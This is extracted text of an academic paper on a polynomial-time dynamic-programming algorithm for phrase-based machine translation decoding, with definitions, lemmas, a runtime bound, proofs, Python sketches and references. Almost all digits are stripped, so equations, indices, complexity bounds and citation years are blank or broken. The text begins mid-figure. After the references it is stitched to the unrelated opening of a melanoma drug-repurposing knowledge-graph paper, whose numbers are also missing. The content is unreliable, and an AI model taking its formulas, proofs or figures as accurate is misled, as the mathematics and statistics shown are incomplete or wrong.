criticisms )( , , seriously )〉〉 h = 〈π 〉 = 〈〈( , ,<s> )( , , we must )( , , also )( , , take )( , , these criticisms )( , , seriously )〉〉 h = 〈π 〉 = 〈〈( , ,<s> )( , , we must )( , , also )( , , take )( , , these criticisms )( , , seriously )( , , </s> )〉〉 figure : sub-derivations hj for j ∈ { , , , , , , } induced by the full derivation h =〈〈 ( , ,<s>)( , , we must)( , , also)( , , take)( , , these criticisms)( , , seriously)( , </s>) 〉〉 . note that hj includes the phrases that cover spans ending before or at position j. sub-derivation hj is extended to another sub- derivation hj+i by incorporating a phrase of length i. . the algorithm we now describe the dynamic programming algo- rithm. intuitively the algorithm builds a deriva- tion by processing the source-language sentence in strictly left-to-right order. this is in contrast with the algorithm of koehn et al. ( b), where the target- language sentence is constructed from left to right. throughout this section we will use π, or πi for some integer i, to refer to a sequence of phrases: π = 〈 p . . .pl 〉 where each phrase pi = (s(pi), t(pi),e(pi)), as de- fined in the previous section. we overload the s, t and e operators, so that if π = 〈 p . . .pl 〉 , we have s(π) = s(p ), t(π) = t(pl), and e(π) = e(p )·e(p ) . . .·e(pl), where x·y is the concatenation of strings x and y. a derivation h consists of a single phrase se- quence π = 〈 p . . .pl 〉 : h = π = 〈 p . . .pl 〉 where the sequence p . . .pl satisfies the con- straints in definition . 
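before moving on, the scoring function defined above can be written down directly. the sketch below is illustrative rather than the authors' implementation: it assumes the phrase translation scores and the bigram language model scores are supplied as python dictionaries of (log-)scores, with eta the distortion penalty weight.

```python
# illustrative sketch of the derivation score f(p_1 ... p_L) from the text:
# language model score + per-phrase translation scores + distortion penalties.
# kappa maps a phrase (s, t, e) to its translation score; lm maps a bigram
# (previous word, word) to its score; eta is the (typically negative) distortion weight.

def derivation_score(phrases, kappa, lm, eta):
    """phrases is a list of (s, t, e) tuples, where e is a tuple of target words."""
    # bigram language model score over the concatenated target string
    target = [w for (_, _, e) in phrases for w in e]
    lm_score = sum(lm[(target[i - 1], target[i])] for i in range(1, len(target)))

    # phrase translation scores
    phrase_score = sum(kappa[p] for p in phrases)

    # distortion penalty |t(p_{i-1}) + 1 - s(p_i)| between consecutive phrases
    distortion = sum(abs(phrases[i - 1][1] + 1 - phrases[i][0])
                     for i in range(1, len(phrases)))

    return lm_score + phrase_score + eta * distortion
```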
we now give a definition of sub-derivations and complement sub-derivations: definition (sub-derivations and complement sub- -derivations). for any h = 〈 p . . .pl 〉 , for any j ∈ { . . .n} such that ∃i ∈ { . . .l} s.t. t(pi) = j, the sub-derivation hj and the complement sub- derivation h̄j are defined as hj =〈π . . .πr〉, h̄j = 〈π̄ . . . π̄r〉 where the following properties hold: • r is an integer with r ≥ . • each πi for i = . . .r is a sequence of one or more phrases, where each phrase p ∈ πi has t(p) ≤ j. • each π̄i for i = . . . (r− ) is a sequence of one or more phrases, where each phrase p ∈ π̄i has s(p) > j. • π̄r is a sequence of zero or more phrases, where each phrase p ∈ π̄r has s(p) > j. we have zero phrases in π̄r iff j = n where n is the length of the sentence. • finally, π · π̄ · π · π̄ . . .πr · π̄r = p . . .pl where x · y denotes the concatenation of phrase sequences x and y. note that for any j ∈ { . . .n} such that @i ∈ { . . .l} such that t(pi) = j, the sub-derivation hj and the complement sub-derivation h̄j is not de- fined. thus for each integer j such that there is a phrase in h ending at point j, we can divide the phrases in h into two sets: phrases p with t(p) ≤ j, and phrases p with s(p) > j. the sub-derivation hj lists all maximal sub-sequences of phrases with t(p) ≤ j. the complement sub-derivation h̄j lists all maximal sub-sequences of phrases with s(p) > j. figure gives all sub-derivations hj for the derivation h = 〈〈 p . . .p 〉〉 = 〈〈 ( , ,<s>)( , , we must)( , , also) ( , , take)( , , these criticisms) ( , , seriously)( , ,</s>) 〉〉 as one example, the sub-derivation h = 〈π ,π 〉 induced by h has two phrase sequences: π = 〈 ( , ,<s>)( , , we must)( , , also) 〉 π = 〈 ( , , these criticisms)( , , seriously) 〉 note that the phrase sequences π and π give trans- lations for all words x . . .x in the sentence. there are two disjoint phrase sequences because in the full derivation h, the phrase p = ( , , take), with t(p) = > , is used to form a longer sequence of phrases π pπ . for the above example, the complement sub- derivation h̄ is as follows: π̄ = 〈 ( , ,take) 〉 π̄ = 〈 ( , ,</s>) 〉 it can be verified that π ·π̄ ·π ·π̄ = h as required by the definition of sub-derivations and complement sub-derivations. we now state the following lemma: lemma . for any derivation h = p . . .pl, for any j such that ∃i such that t(pi) = j, the sub- derivation hj = 〈π . . .πr〉 satisfies the following properties: . s(π ) = and e (π ) = <s>. . for all positions i ∈ { . . .j}, there exists a phrase p ∈ π, for some phrase sequence π ∈ hj, such that s(p) ≤ i ≤ t(p). . for all i = . . .r, s(πi) ∈{(j −d + ) . . .j} . for all i = . . .r, t(πi) ∈{(j −d) . . .j} here d is again the distortion limit. this lemma is a close analogy of lemma . the proof is as follows: proof of property : for all values of j, the phrase p = ( , ,<s>) has t(p ) ≤ j, hence we must have π = p . . .pk for some k ∈ { . . .l}. it follows that s(π ) = and e (π ) = <s>. proof of property : for any position i ∈ { . . .j}, define the phrase (s,t,e) in the derivation h to be the phrase that covers word i; i.e., the phrase such that s ≤ i ≤ t. we must have s ∈ { . . .j}, because s ≤ i and i ≤ j. we must also have t ∈{ . . .j}, because otherwise we have s ≤ j < t, which contradicts the assumption that there is some i ∈{ . . .l} such that t(pi) = j. it follows that the phrase (s,t,e) has t ≤ j, and from the definition of sub-derivations it follows that the phrase is in one of the phrase sequences π . . .πr. 
proof of property : this follows from the distor- tion limit. consider the complement sub-derivation h̄j = 〈π̄ . . . π̄r〉. for the distortion limit to be sat- isfied, for all i ∈{ . . .r}, we must have |t(π̄i− ) + −s(πi)| ≤ d we must also have t(π̄i− ) > j, and s(πi) ≤ j, by the definition of sub-derivations. it follows that s(πi) ∈{(j −d + ) . . .j}. proof of property : this follows from the distortion limit. first consider the case where π̄r is non-empty. for the distortion limit to be satisfied, for all i ∈ { . . .r}, we must have |t(πi) + −s(π̄i)| ≤ d we must also have t(πi) ≤ j, and s(π̄i) > j, by the definition of sub-derivations. it follows that t(πi) ∈ {(j −d) . . .j}. next consider the case where π̄r is empty. in this case we must have j = n. for the distortion limit to be satisfied, for all i ∈{ . . . (r− )}, we must have |t(πi) + −s(π̄i)| ≤ d we must also have t(πi) ≤ j, and s(π̄i) > j, by the definition of sub-derivations. it follows that t(πi) ∈ {(j−d) . . .j} for i ∈{ . . . (r− )}. for i = r, we must have t(πi) = n, from which it again follows that t(πr) = n ∈{(j −d) . . .j}. we now define an equivalence relation between sub-derivations, which will be central to the dy- namic programming algorithm. we define a func- tion σ that maps a phrase sequence π to its signature. the signature is a four-tuple: σ(π) = (s,ws, t,wt). where s is the start position, ws is the start word, t is the end position and wt is the end word of the phrase sequence. we will use s(σ), ws(σ), t(σ), and wt(σ) to refer to each component of a signature σ. for example, given a phrase sequence π = 〈 ( , , <s>) ( , , we) ( , , also) 〉 , its signature is σ(π) = ( , <s>, , also). the signature of a sub-derivation hj = 〈π . . .πr〉 is defined to be σ(hj) = 〈σ(π ) . . .σ(πr)〉. for example, with h as defined above, we have σ(h ) = 〈( ,<s>, , also ) , ( , these, , seriously )〉 two partial derivations hj and h′j are in the same equivalence class iff σ(hj) = σ(h′j). we can now state the following lemma: lemma . define h∗ to be the optimal deriva- tion for some input sentence, and h∗j to be a sub- derivation of h∗. suppose h′j is another sub- derivation with j words, such that σ(h′j) = σ(h ∗ j ). then it must be the case that f(h∗j ) ≥ f(h′j), where f is the function defined in section . . proof. define the sub-derivation and complement sub-derivation of h∗ as h∗j = 〈π . . .πr〉 h̄∗j = 〈π̄ . . . π̄r〉 we then have f(h∗) = f(h∗j ) + f(h̄ ∗ j ) + γ ( ) where f(. . .) is as defined in eq. , and γ takes into account the bigram language modeling scores and the distortion scores for the transitions π → π̄ , π̄ → π , π → π̄ , etc. the proof is by contradiction. define h′j = π ′ . . .π ′ r and assume that f(h∗j ) < f(h ′ j). now consider h′ = π′ π̄ π ′ π̄ . . .π ′ rπ̄r this is a valid derivation because the transitions π′ → π̄ , π̄ → π′ , π′ → π̄ have the same dis- tortion distances as π → π̄ , π̄ → π , π → π̄ , hence they must satisfy the distortion limit. we have f(h′) = f(h′j) + f(h̄ ∗ j ) + γ ( ) where γ has the same value as in eq. . this fol- lows because the scores for the transitions π′ → π̄ , π̄ → π′ , π′ → π̄ are identical to the scores for the transitions π → π̄ , π̄ → π , π → π̄ , because σ(h∗j ) = σ(h ′ j). it follows from eq. and eq. that if f(h′j) > f(h∗j ), then f(h ′) > f(h∗). but this contradicts the assumption that h∗ is optimal. it follows that we must have f(h′j) ≤ f(h∗j ). this lemma leads to a dynamic programming al- gorithm. each dynamic programming state consists of an integer j ∈{ . . 
.n} and a set of r signatures: t = (j,{σ . . .σr}) figure shows the dynamic programming algo- rithm. it relies on the following functions: inputs: • an integer n specifying the length of the input sequence. • a function δ(t) returning the set of valid transitions from state t . • a function τ(t, ∆) returning the state reached from state t by transition ∆ ∈ δ(t). • a function valid(t) returning true if state t is valid, otherwise false. • a function score(∆) that returns the score for any transition ∆. initialization: t = ( ,{( ,<s>, ,<s>)}) α(t ) = t = {t }, ∀j ∈{ . . .n},tj = ∅ for j = , . . . ,n− for each state t ∈tj for each ∆ ∈ δ(t) t ′ = τ(t, ∆) if valid(t ′) = false: continue score = α(t) + score(∆) define t to be the integer such that t ′ = (t,{σ . . .σr}) if t ′ /∈tt tt = tt ∪{t ′} α(t ′) = score bp(t ′) = (∆) else if score > α(t ′) α(t ′) = score bp(t ′) = (∆) return: the score of the state (n,{( ,<s>,n,</s>)}) in tn, and backpointers bp defining the transitions leading to this state. figure : the phrase-based decoding algorithm. α(t) is the score for state t . the bp(t) variables are back- pointers used in recovering the highest scoring sequence of transitions. • for any state t , δ(t) is the set of outgoing tran- sitions from state t . • for any state t , for any transition ∆ ∈ δ(t), τ(t, ∆) is the state reached by transition ∆ from state t . • for any state t , valid(t) checks if a resulting state is valid. • for any transition ∆, score(∆) is the score for the transition. we next give full definitions of these functions. . . definitions of δ(t) and τ(t, ∆) recall that for any state t , δ(t) returns the set of possible transitions from state t . in addition τ(t, ∆) returns the state reached when taking tran- sition ∆ ∈ δ(t). given the state t = (j,{σ . . .σr}), each transi- tion is of the form ψ pψ where ψ , p and ψ are defined as follows: • p is a phrase such that s(p) = j + . • ψ ∈{σ . . .σr}∪{φ}. if ψ = φ, it must be the case that |t(ψ ) + −s(p)| ≤ d and t(ψ ) = n. • ψ ∈{σ . . .σr}∪{φ}. if ψ = φ, it must be the case that |t(p) + −s(ψ )| ≤ d and s(ψ ) = . • if ψ = φ and ψ = φ, then ψ = ψ . thus there are four possible types of transition from a state t = (j,{σ . . .σr}): case : ∆ = φpφ. in this case the phrase p is incorporated as a stand-alone phrase. the new state t ′ is equal to (j′,{σ′ . . .σ′r+ }) where j′ = t(p), where σ′i = σi for i = . . .r, and σ ′ r+ = (s(p),e (p), t(p),em(p)). case : ∆ = σi pφ for some σi ∈ {σ . . .σr}. in this case the phrase p is appended to the signa- ture σi. the new state t ′ = τ(t, ∆) is of the form (j′,σ′ . . .σ ′ r), where j ′ = t(p), where σi is replaced by (s(σi),ws(σi), t(p),em(p)), and where σ′i′ = σi′ for all i′ = i. case : ∆ = φpσi for some σi ∈ {σ . . .σr}. in this case the phrase p is prepended to the signa- ture σi. the new state t ′ = τ(t, ∆) is of the form (j′,σ′ . . .σ ′ r), where j ′ = t(p), where σi is replaced by (s(p),e (p), t(σi),wt(σi)), and where σ′i′ = σi′ for all i′ = i. case : ∆ = σi pσi′ for some σi,σi′ ∈ {σ . . .σr}, with i′ = i. in this case phrase p is appended to signature σi, and prepended to signature σi′, effectively joining the two signa- tures together. in this case the new state t ′ = τ(t, ∆) is of the form (j′,σ′ . . .σ ′ r− ), where sig- natures σi and σi′ are replaced by a new signature (s(σi),ws(σi), t(σi′),wt(σi′)), and all other signa- tures are copied across from t to t ′. figure gives the dynamic programming states and transitions for the derivation h in figure . 
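to make the state representation concrete, here is a small illustrative python sketch (not the authors' code) of the transition above that appends a phrase to an existing signature (the sigma_i p phi case); the (s, ws, t, wt) tuple layout follows the signature definition, the distortion check mirrors the condition |t(sigma_i) + 1 - s(p)| <= d, and the example numbers are invented. only the state update is shown, not the scoring.

```python
# illustrative sketch of a dynamic-programming state and the "append to a signature"
# transition, in which a phrase p with s(p) = j + 1 is appended to one of the signatures.
# a signature is a tuple (s, ws, t, wt); a state is (j, frozenset of signatures).

def append_phrase(state, sig, phrase, d):
    """apply the sigma_i p phi transition; return the new state, or None if the
    distortion limit d would be violated."""
    j, sigs = state
    s, t, words = phrase               # phrase covers source words s..t with target `words`
    assert s == j + 1, "phrases are consumed strictly left to right on the source side"
    sig_s, sig_ws, sig_t, sig_wt = sig
    if abs(sig_t + 1 - s) > d:         # distortion check between the signature end and p
        return None
    new_sig = (sig_s, sig_ws, t, words[-1])
    return (t, frozenset((sigs - {sig}) | {new_sig}))

# toy example: append a phrase covering source words 5..6 ("these criticisms")
# to a signature that currently ends at word 4 with target word "also".
state = (4, frozenset({(1, "<s>", 4, "also")}))
new_state = append_phrase(state, (1, "<s>", 4, "also"), (5, 6, ("these", "criticisms")), d=3)
print(new_state)   # (6, frozenset({(1, '<s>', 6, 'criticisms')}))
```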
for example, the sub-derivation h = 〈〈 ( , ,<s>)( , , we must)( , , also) 〉 , 〈 ( , , these criticisms)( , , seriously) 〉〉 will be mapped to a state t = ( ,σ(h ) ) = ( , { ( ,<s>, , also), ( , these, , seriously) }) ( , { σ = ( ,<s>, ,<s> )}) ( , { σ = ( ,<s>, , must )}) ( , { σ = ( ,<s>, , also )}) ( , { σ = ( ,<s>, , also ) , σ = ( , these, , criticisms )}) ( , { σ = ( ,<s>, , also ) , σ = ( , these, , seriously )}) ( , { σ = ( ,<s>, , seriously )}) ( , { σ = ( ,<s>, ,</s> )}) σ ( , , we must) φ σ ( , , also) φ φ ( , , these criticisms) φ σ ( , , seriously) φ σ ( , , take) σ σ ( , , </s>) φ figure : dynamic programming states and the transi- tions from one state to another, using the same example as in figure . note that σi = σ(πi) for all πi ∈ hj. the transition σ ( , , take) σ from this state leads to a new state, t ′ = ( , { σ = ( ,<s>, , seriously) }) . definition of score(∆) figure gives the definition of score(∆), which incorporates the language model, phrase scores, and distortion penalty implied by the transition ∆. . definition of valid(t) figure gives the definition of valid(t). this function checks that the start and end points of each signature are in the set of allowed start and end points given in lemma . . a bound on the runtime of the algorithm we now give a bound on the algorithm’s run time. this will be the product of terms n and m, where n is an upper bound on the number of states in the dynamic program, and m is an upper bound on the number of outgoing transitions from any state. for any j ∈{ . . .n}, define first(j) to be the set of target-language words that can begin at posi- tion j and last(j) to be the set of target-language ∆ resulting phrase sequence score(∆) φpφ (s,e , t,em) ŵ(p) σi pφ (s(σi),ws(σi), t,em) ŵ(p) + λ(e |wt(σi)) + η ×|t(σi) + −s| φpσi (s,e , t(σi),wt(σi)) ŵ(p) + λ(ws(σi)|em) + η ×|t + −s(σi)| σi pσi′ (s(σi),ws(σi), t(σi′ ),wt(σi′ )) ŵ(p) + λ(e |wt(σi)) + η ×|t(σi) + −s| +λ(ws(σi′ )|em) + η ×|t + −s(σi′ )| figure : four operations that can extend a state t = (j,{σ . . .σr}) by a phrase p = (s,t,e . . .em), and the scores incurred. we define ŵ(p) = κ(p) +∑m i= λ(ei(p)|ei− (p)). the function ŵ(p) includes the phrase translation model κ and the language model scores that can be computed using p alone. the weight η is the distortion penalty. function valid(t) input: state t = ( j,{σ . . .σr} ) for i = . . .r if s(σi) < j −d + and s(σi) = return false if t(σi) < j −d return false return true figure : the valid function. words that can end at position j. first(j) = {w : ∃p = (s,t,e) s.t. s = j,e = w} last(j) = {w : ∃p = (s,t,e) s.t. t = j,em = w} in addition, define singles(j) to be the set of phrases that translate the single word at position j: singles(j) = {p : s(p) = j and t(p) = j} next, define h to be the smallest integer such that for all j, |first(j)| ≤ h, |last(j)| ≤ h, and |singles(j)| ≤ h. thus h is a measure of the maximal ambiguity of any word xj in the input. finally, for any position j, define start(j) to be the set of phrases starting at position j: start(j) = {p : s(p) = j} and define l to be the smallest integer such that for all j, |start(j)| ≤ l. given these definitions we can state the following result: theorem . the time complexity of the algorithm is o(nd!lhd+ ). to prove this we need the following definition: definition (p-structures). for any finite set a of integers with |a| = k, a p-structure is a set of r or- dered pairs {(si, ti)}ri= that satisfies the following properties: ) ≤ r ≤ k; ) for each i ∈ { . . 
.r}, si ∈ a and ti ∈ a (both si = ti and si = ti are allowed); ) for each j ∈ a, there is at most one index i ∈{ . . .r} such that (si = j) or (ti = j) or (si = j and ti = j). we use g(k) to denote the number of unique p- structures for a set a with |a| = k. we then have the following lemmas: lemma . the function g(k) satisfies g( ) = , g( ) = , and the following recurrence for k ≥ : g(k) = g(k − ) + (n− )g(k − ) proof. the proof is in appendix a. lemma . consider the function h(k) = k ×g(k). h(k) is in o((k − )!). proof. the proof is in appendix b. we can now prove the theorem: proof of theorem : first consider the num- ber of states in the dynamic program. each state is of the form (j,{σ . . .σr}) where the set {(s(σi), t(σi))}ri= is a p-structure over the set { }∪ {(j − d) . . .d}. the number of possible values for {(s(σi),e(σi))}ri= is at most g(d + ). for a fixed choice of {(s(σi), t(σi))}ri= we will ar- gue that there are at most hd+ possible values for {(ws(σi),wt(σi))}ri= . this follows because for each k ∈ {(j − d) . . .j} there are at most h pos- sible choices: if there is some i such that s(σi) = k, and t(σi) = k, then the associated word ws(σi) is in the set first(k); alternatively if there is some i such that t(σi) = k, and s(σi) = k, then the as- sociated word wt(σi) is in the set last(k); alterna- tively if there is some i such that s(σi) = t(σi) = k then the associated words ws(σi),wt(σi) must be the first/last word of some phrase in singles(k); alternatively there is no i such that s(σi) = k or t(σi) = k, in which case there is no choice asso- ciated with position k in the sentence. hence there are at most h choices associated with each position k ∈ {(j − d) . . .j}, giving hd+ choices in total. combining these results, and noting that there are n choices of the variable j, implies that there are at most ng(d + )hd+ states in the dynamic program. now consider the number of transitions from any state. a transition is of the form ψ pψ as defined in section . . . for a given state there are at most (d + ) choices for ψ and ψ , and l choices for p, giving at most (d + ) l choices in total. multiplying the upper bounds on the number of states and number of transitions for each state gives an upper bound on the runtime of the algorithm as o(ng(d + )hd+ (d + ) l). hence by lemma the runtime is o(nd!lhd+ ) time. the bound g(d + ) over the number of possible values for {(s(σi),e(σi))}ri= is somewhat loose, as the set of p-structures over { }∪{(j −d) . . .d} in- cludes impossible values {(si, ti)}ri= where for ex- ample there is no i such that s(σi) = . however the bound is tight enough to give the o(d!) runtime. discussion we conclude the paper with discussion of some is- sues. first we describe how the dynamic program- ming structures we have described can be used in conjunction with beam search. second, we give more analysis of the complexity of the widely-used decoding algorithm of koehn et al. ( ). . beam search beam search is widely used in phrase-based decod- ing; it can also be applied to our dynamic program- ming construction. we can replace the line for each state t ∈tj in the algorithm in figure with for each state t ∈ beam(tj) where beam is a function that returns a subset of tj, most often the highest scoring elements of tj un- der some scoring criterion. a key question concerns the choice of scoring function γ(t) used to rank states. one proposal is to define γ(t) = α(t) + β(t) where α(t) is the score used in the dynamic program, and β(t) = ∑ i:ws(σi) =<s> λu(ws(σi)). 
here λu(w) is the score of word w under a unigram language model. the β(t) scores allow different states in tj, which have different words ws(σi) at the start of signatures, to be comparable: for exam- ple it compensates for the case where ws(σi) is a rare word, which will incur a low probability when the bigram 〈w ws(σi)〉 for some word w is constructed during search. the β(t) values play a similar role to “future scores” in the algorithm of koehn et al. ( ). however in the koehn et al. ( ) algorithm, dif- ferent items in the same beam can translate differ- ent subsets of the input sentence, making future- score estimation more involved. in our case all items in tj translate all words x . . .xj inclusive, which may make comparison of different hypotheses more straightforward. . complexity of decoding with bit-string representations a common method for decoding phrase-based mod- els, as described in koehn et al. ( ), is to use beam search in conjunction with a search algorithm that ) creates the target language string in strictly left-to-right order; ) uses a bit string with bits bi ∈{ , } for i = . . .n representing at each point whether word i in the input has been translated. a natural question is whether the number of possible bit strings for a model with a fixed distortion limit d can grow exponentially quickly with respect to the length of the input sentence. this section gives an example that shows that this is indeed the case. assume that our sentence length n is such that (n− )/ is an integer. assume as before x = <s> and xn = </s>. for each k ∈ { . . . ((n− )/ − )}, assume we have the following phrases for the words x k+ . . .x k+ : ( k + , k + ,uk) ( k + , k + ,vk) ( k + , k + ,wk) ( k + , k + ,zk) ( k + , k + ,yk) note that the only source of ambiguity is for each k whether we use yk to translate the entire phrase x k+ x k+ , or whether we use wk and zk to trans- late x k+ and x k+ separately. with a distortion limit d ≥ , the number of pos- sible bit strings in this example is at least (n− )/ . this follows because for any setting of the variables b k+ ∈ { , } for k ∈ { . . . ((n − )/ − )}, there is a valid derivation p . . .pl such that the pre- fix p . . .pl where l = + (n − )/ gives this bit string. simply choose p = ( , ,<s>) and for l′ ∈ { . . . (n− )/ − } choose pl′+ = ( l′ + , l′ + ,yi) if b k+ = , pl′+ = ( l′ + , l′ + ,zi) otherwise. it can be verified that p . . .pl is a valid prefix (there is a valid way to give a complete deriva- tion from this prefix). as one example, for n = , and b = and b = , a valid derivation is ( , ,<s>)( , ,y )( , ,z )( , ,v )( , ,v ) ( , ,u )( , ,u )( , ,w )( , ,</s>) in this case the prefix ( , ,<s>)( , ,y )( , ,z ) gives b = and b = . other values for b and b can be given by using ( , ,z ) in place of ( , ,y ), and ( , ,y ) in place of ( , ,z ), with the follow- ing phrases modified appropriately. conclusion we have given a polynomial-time dynamic program- ming algorithm for phrase-based decoding with a fixed distortion limit. the algorithm uses a quite dif- ferent representation of states from previous decod- ing algorithms, is easily amenable to beam search, and leads to a new perspective on phrase-based de- coding. future work should investigate the effec- tiveness of the algorithm in practice. a proof of lemma without loss of generality assume a = { , , , . . .k}. we have g( ) = , because in this case the valid p-structures are {( , )} and ∅. 
to calculate g(k) we can sum over four possibilities: case : there are g(k− ) p-structures with si = ti = for some i ∈ { . . .r}. this follows because once si = ti = for some i, there are g(k − ) possible p-structures for the integers { , , . . .k}. case : there are g(k − ) p-structures such that si = and ti = for all i ∈ { . . .r}. this fol- lows because once si = and ti = for all i, there are g(k − ) possible p-structures for the integers { , , . . .k}. case : there are (k− ) ×g(k− ) p-structures such that there is some i ∈ { . . .r} with si = and ti = . this follows because for the i such that si = , there are (k− ) choices for the value for ti, and there are then g(k− ) possible p-structures for the remaining integers in the set { . . .k}/{ , ti}. case : there are (k− ) ×g(k− ) p-structures such that there is some i ∈ { . . .r} with ti = and si = . this follows because for the i such that ti = , there are (k− ) choices for the value for si, and there are then g(k− ) possible p-structures for the remaining integers in the set { . . .k}/{ ,si}. summing over these possibilities gives the fol- lowing recurrence: g(k) = g(k − ) + (k − ) ×g(k − ) b proof of lemma recall that h(k) = f(k) ×g(k) where f(k) = k . define k to be the smallest integer such that for all k ≥ k , f(k) f(k − ) + f(k) f(k − ) · k − k − ≤ k − ( ) for f(k) = k we have k = . now choose a constant c such that for all k ∈ { . . . (k − )}, h(k) ≤ c × (k − )!. we will prove by induction that under these definitions of k and c we have h(k) ≤ c(k − )! for all integers k, hence h(k) is in o((k − )!). for values k ≥ k , we have h(k) = f(k)g(k) = f(k)g(k − ) + f(k)(k − )g(k − ) ( ) = f(k) f(k − )h(k − ) + f(k) f(k − ) (k − )h(k − ) ≤ ( cf(k) f(k − ) + cf(k) f(k − ) · k − k − ) (k − )! ( ) ≤ c(k − )! ( ) eq. follows from g(k) = g(k− )+ (k− )g(k− ). eq. follows by the inductive hypothesis that h(k − ) ≤ c(k − )! and h(k − ) ≤ c(k − )!. eq follows because eq. holds for all k ≥ k . references wilker aziz, marc dymetman, and lucia specia. . exact decoding for phrase-based statistical machine translation. in proceedings of the conference on em- pirical methods in natural language processing. as- sociation for computational linguistics. yin-wen chang and michael collins. . exact de- coding of phrase-based translation models through la- grangian relaxation. in proceedings of the conference on empirical methods in natural language process- ing, pages – . association for computational lin- guistics. colin cherry, robert c moore, and chris quirk. . on hierarchical re-ordering and permutation parsing for phrase-based decoding. in proceedings of the seventh workshop on statistical machine translation, pages – . association for computational lin- guistics. john denero and dan klein. . the complexity of phrase alignment problems. in proceedings of the th annual meeting of the association for computational linguistics on human language technologies: short papers, pages – . association for computational linguistics. yang feng, haitao mi, yang liu, and qun liu. . an efficient shift-reduce decoding algorithm for phrased- based machine translation. in proceedings of the rd international conference on computational linguis- tics: posters, pages – . association for compu- tational linguistics. michel galley and christopher d manning. . a simple and effective hierarchical phrase reordering model. in proceedings of the conference on empir- ical methods in natural language processing, pages – . association for computational linguistics. 
michel galley and christopher d manning. . accu- rate non-hierarchical phrase-based translation. in hu- man language technologies: the annual con- ference of the north american chapter of the associ- ation for computational linguistics, pages – . association for computational linguistics. kevin knight. . decoding complexity in word- replacement translation models. computational lin- guistics, ( ). philipp koehn, franz josef och, and daniel marcu. . statistical phrase-based translation. in proceed- ings of the conference of the north american chapter of the association for computational linguis- tics on human language technology-volume , pages – . association for computational linguistics. philipp koehn, amittai axelrod, chris callison-burch, miles osborne, and david talbot. a. edinburgh system description for the iwslt speech trans- lation evaluation. in proceedings of the second work- shop on statistical machine translation, statmt ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richard zens, chris dyer, ondřej bojar, alexandra con- stantin, and evan herbst. b. moses: open source toolkit for statistical machine translation. in proceed- ings of the th annual meeting of the acl on inter- active poster and demonstration sessions, pages – . association for computational linguistics. shankar kumar and william byrne. . local phrase reordering models for statistical machine translation. in proceedings of the conference on human language technology and empirical methods in natural lan- guage processing, pages – . association for computational linguistics. eugene leighton lawler, jan karel lenstra, alexander hendrik george rinnooy kan, and david bernard shmoys. . the traveling salesman problem. john wiley & sons ltd. adam lopez. . translation as weighted deduction. in proceedings of the th conference of the european chapter of the association for computational linguis- tics, pages – . association for computational linguistics. burkhard monien and ivan hal sudborough. . bandwidth constrained np-complete problems. in proceedings of the thirteenth annual acm symposium on theory of computing, pages – . acm. franz josef och and hermann ney. . the align- ment template approach to statistical machine transla- tion. computational linguistics, ( ): – . h donald ratliff and arnon s rosenthal. . order- picking in a rectangular warehouse: a solvable case of the traveling salesman problem. operations research, ( ): – . christoph tillmann. . a unigram orientation model for statistical machine translation. in proceedings of hlt-naacl : short papers, pages – . as- sociation for computational linguistics. dekai wu. . stochastic inversion transduction grammars and bilingual parsing of parallel corpora. computational linguistics, ( ): – . mikhail zaslavskiy, marc dymetman, and nicola can- cedda. . phrase-based statistical machine transla- tion as a traveling salesman problem. in proceedings of the joint conference of the th annual meeting of the acl and the th international joint conference on natural language processing of the afnlp: volume -volume , pages – . association for compu- tational linguistics. richard zens and hermann ney. . a comparative study on reordering constraints in statistical machine translation. in proceedings of the st annual meeting on association for computational linguistics-volume , pages – . 
association for computational lin- guistics. richard zens, hermann ney, taro watanabe, and ei- ichiro sumita. . reordering constraints for phrase-based statistical machine translation. in pro- ceedings of the th international conference on computational linguistics, page . association for computational linguistics. finding melanoma drugs through a probabilistic knowledge graph finding melanoma drugs through a probabilistic knowledge graph james p. mccusker , michel dumontier , rui yan , sylvia he , jonathan s. dordick , and deborah l. mcguinness , department of computer science, rensselaer polytechnic institute, troy, ny, usa stanford center for biomedical informatics research, stanford university school of medicine, stanford, ca, usa department of chemical & biological engineering, rensselaer polytechnic institute, troy, ny, usa center for biotechnology & interdisciplinary studies, rensselaer polytechnic institute, troy, ny, usa abstract metastatic cutaneous melanoma is an aggressive skin cancer with some progression- slowing treatments but no known cure. the omics data explosion has created many possible drug candidates; however, filtering criteria remain challenging, and systems biology approaches have become fragmented with many disconnected databases. using drug, protein and disease interactions, we built an evidence-weighted knowledge graph of integrated interactions. our knowledge graph-based system, redrugs, can be used via an application programming interface or web interface, and has generated high-quality melanoma drug candidates. we show that probabilistic analysis of systems biology graphs increases drug candidate quality compared to non-probabilistic methods. four of the candidates are novel therapies, three of which have been tested with other cancers. all other candidates have current or completed clinical trials, or have been studied in in vivo or in vitro. this approach can be used to identify candidate therapies for use in research or personalized medicine. subjects bioinformatics, computational biology, data science, world wide web and web science keywords melanoma, knowledge graphs, drug repositioning, uncertainty reasoning introduction metastatic cutaneous melanoma is an aggressive cancer of the skin with low prevalence but very high mortality rate, with an estimated -year survival rate of % (barth, wanek & morton, ). there are currently no known therapies that can consistently cure metastatic melanoma. vemurafenib is effective against braf mutant melanomas (chapman et al., ) but resistant cells often result in recurrence of metastases (le et al., ). melanoma itself may be best approached based on the individual genetics of the tumor, as it has been shown to involve mutations in many different genes to produce the same disease (krauthammer et al., ). because of this, an individualized approach may be necessary to find effective treatments. drug repurposing, or the discovery of new uses for existing approved drugs, can often lead to effective new treatments for diseases. a wide range of computational methods have been developed in support of drug repositioning. computational approaches (sanseau & koehler, ) include topic modeling (bisgin et al., , ), side-effect how to cite this article mccusker et al. ( ), finding melanoma drugs through a probabilistic knowledge graph. peerj comput. sci. :e ; doi . /peerj-cs. submitted april accepted december published february corresponding authors james p. mccusker, mccusj@cs.rpi.edu deborah l. 
